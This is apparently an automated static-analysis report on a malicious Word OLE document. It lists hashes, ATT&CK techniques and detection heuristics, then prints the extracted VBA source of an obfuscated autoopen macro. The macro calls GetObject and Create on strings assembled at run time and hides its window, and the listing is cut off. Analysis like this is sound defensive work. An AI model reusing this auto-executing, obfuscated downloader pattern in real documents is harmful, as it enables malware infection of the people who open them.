Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94175f6404af2c6d…

MALICIOUS

Office (OLE)

Size: 155.4 KB · Created: 2019-03-22 18:08:00 · Authoring application: Microsoft Office Word · First seen: 2020-02-04
MD5: 3d0805bb03b8caac44c23db4ed76b5b6 SHA-1: e35a8776ad6e02f2920cac3b55f62a9cf5f516c2 SHA-256: 94175f6404af2c6de995aa6f8f37bdb2faeafe5f952297b6f13c3052cefcb618
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 – Visual Basic; T1203 – Exploitation for Client Execution

The sample is a malicious OLE document containing VBA macros. The 'autoopen' macro is present and uses a GetObject call, a common technique for executing arbitrary code from a macro; in the extracted source the object returned by GetObject has its Create method invoked on strings assembled at run time from properties of the CAUAAD4A module, and the surrounding blocks of arithmetic on otherwise unused names appear to be obfuscation padding. This suggests the macro is designed to download and execute a secondary payload. No specific family could be identified.

Heuristics 7

  • ClamAV: Doc.Malware.00536d-6905404-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6905404-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches macro documents that carry only p-code, or whose source extraction failed, so that no visible source is available.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE. (Note: this report also lists a recovered VBA project under Extracted artifacts — macros.bas — so the "no modern VBA project was recovered" condition should be re-checked against that artifact.)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. A URL by itself is not a detection — see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) in which each URL was found.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). This is the standard Office Open XML DrawingML namespace identifier, expected in Office documents and not by itself an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16253 bytes
SHA-256: 2805b2ee5d868dc3dc6a29e49c48a6618e7cb2dbc33c61208bb5aaf194538ae1
Preview script
First 1,000 lines of the extracted script
' Module header as exported by olevba for the Word document module:
' VB_Base names Normal.ThisDocument and VB_PredeclaredId = True marks it as
' having a predeclared (auto-instantiated) instance. Only Attribute metadata
' is present for this module in the preview — no procedures follow it.
Attribute VB_Name = "MABX_AA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module header for CAUAAD4A. VB_Base carries a pair of GUIDs rather than a
' document name, which is consistent with a designer/UserForm module —
' NOTE(review): confirm against the extracted form streams. The autoopen
' routine later in this listing reads string properties from this module
' (CAUAAD4A.Tag and several other members) to build the arguments it passes to
' GetObject and Create; no procedure body for this module appears in the preview.
Attribute VB_Name = "CAUAAD4A"
Attribute VB_Base = "0{58BDD7E3-CD44-4BBC-AD4C-5B2C1B4C737F}{D1FCCB9E-8A5A-438C-9695-53A6C7F26411}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Module TAQZAQ: holds the autoopen entry point that follows (its body is cut
' off at the end of this preview, so the full control flow is not visible here).
Attribute VB_Name = "TAQZAQ"
Sub autoopen()
On Error Resume Next
   If WB4kAxxU = jA1BGx Then
   bAAQBBQ = CVar(bcAABGAc)
   XkBAUZ = (361856692 + Rnd(swDGxXD * _
Tan(670207210 / Chr(959094389 / CDbl(BAXAZAUA) * GBwAAA / CDbl(945131424)))) * 5248483 * _
Atn(118102828 / Oct(270103415) - 498705691 * Int(UQA1UA)) * (476513465 - Atn(QQXkCA)))
   FQwQUD = Int(fCAGBUXZ - _
mAkGADDA - 532937956 * Int(463911198))
End If
   If BAAAAA = TwA_AZ Then
   Q_1AxQAB = CVar(iwAQAoQ)
   NZDQ_wAA = (456055239 + Rnd(CAXo4Z * _
Tan(110637946 / Chr(75687518 / CDbl(Ooxo_GA) * wC_AkwwG / CDbl(830735814)))) * 827179447 * _
Atn(745795208 / Oct(609503975) - 989914408 * Int(aUxDAQQA)) * (780105833 - Atn(iAAcBX1Z)))
   dZDADA = Int(NA1AAD - _
k_XAZU_ - 128432854 * Int(636648753))
End If
Set mQAZBcAw = GetObject(CAUAAD4A.Tag + CAUAAD4A.pAA1AAw + CAUAAD4A.Tag)
   If hDACDAA_ = rBAoAA4 Then
   KxADoB = CVar(NkAAAD)
   TAokxGBB = (83831580 + Rnd(VAAG1Bc * _
Tan(729045409 / Chr(745065093 / CDbl(JUAGAAAD) * iAGAAADQ / CDbl(472591411)))) * 780624623 * _
Atn(16730696 / Oct(765002805) - 907106983 * Int(v__UXD)) * (910452953 - Atn(E_BDxwQ)))
   uAAGQB4 = Int(OwcAZB - _
s4UZUAA1 - 817613847 * Int(282481694))
End If
   If zAAAX4 = scUBoD Then
   oAAUAUwQ = CVar(BAUAQA)
   ZAGA4CAA = (325604763 + Rnd(EDBDDA * _
Tan(537209165 / Chr(596191568 / CDbl(LkZAkB) * w_QQD4B / CDbl(134012084)))) * 617179906 * _
Atn(290909337 / Oct(301599142) - 371330800 * Int(YAkU_AA)) * (582876688 - Atn(fAAZAA_)))
   vU1AB1cQ = Int(M1DAAGAk - _
MAD_cA - 325894414 * Int(332664317))
End If
mQAZBcAw.ShowWindow = 520547 - 520547
   If QDQXoA = bAUBQAB Then
   fA_BZAA = CVar(aUQwAA)
   zkAQA_wU = (948186498 + Rnd(jUADcAZ * _
Tan(661997652 / Chr(404270844 / CDbl(XADG1D41) * RcGABA / CDbl(458913573)))) * 808576560 * _
Atn(244440450 / Oct(864696547) - 535289087 * Int(JA_xAAUA)) * (113810590 - Atn(jUAZAo)))
   kA1ADCk = Int(sAU1Qo - _
rAQo4UwA - 572344987 * Int(744573596))
End If
   If I4QAAw = GAUAQ_ Then
   SBAwBAk = CVar(VxGAAUD)
   IAABDQCA = (654080361 + Rnd(ZGAwZAXC * _
Tan(151615336 / Chr(439660132 / CDbl(M_AXAUG) * EGAwAA_ / CDbl(527140049)))) * 249906657 * _
Atn(775947477 / Oct(141053823) - 534070673 * Int(lBAAAQ)) * (165508903 - Atn(oQCD_AA)))
   DXUxBcAA = Int(uGwCQUX - _
tox_A1Q_ - 497083825 * Int(717881341))
End If
   If iAQAABUD = rU1oGD1 Then
   cUBUUX = CVar(NABAA_)
   lUAoCBA = (182176414 + Rnd(l_DAcCx * _
Tan(102860209 / Chr(670300922 / CDbl(tAkAQkGA) * NA1CcB / CDbl(707709011)))) * 212994341 * _
Atn(970779812 / Oct(75768412) - 667968822 * Int(ZkCBAA)) * (307409386 - Atn(ioBA4AA_)))
   qU_XD_xD = Int(k1D_AA44 - _
RBA_4A - 97695298 * Int(628776459))
End If
GetObject(CAUAAD4A.Tag + CAUAAD4A.AkwAokG + CAUAAD4A.Tag). _
Create CAUAAD4A.Tag + CAUAAD4A.l4k_GAcD + CAUAAD4A.Tag + CAUAAD4A.nc_AcAA + CAUAAD4A.Tag + CAUAAD4A.Tag + CAUAAD4A.V_k4AABZ + CAUAAD4A.Tag + CAUAAD4A.Tag + CAUAAD4A.TDQAAkAw + CAUAAD4A.Tag + CAUAAD4A.iBQQDoZG + CAUAAD4A.Tag, jX_ZGUc, mQAZBcAw, CAUAAD4A.Tag
   If zUAB_UQ = iQAAB1Ao Then
   qBGBACQo = CVar(NAQBDcX)
   TDAQxBZA = (965229187 + Rnd(VUG1QA1 * _
Tan(803650193 / Chr(951259717 / CDbl(bD_UBcAo) * sXoUAQ / CDbl(673736416)))) * 999341581 * _
Atn(815677241 / Oct(209115507) - 562706653 * Int(LoDZAQ)) * (669032359 - Atn(D_BB14x)))
   EUAQXAAD = Int(pkADAAA - _
aAAXGD - 123054732 * Int(423442300))
End If
   If ZDUCAADk = DAAAA_Dx Then
   bcAAx_G = CVar(wAAXAZAU)
   i_DBBGUB = (3325171
... (truncated)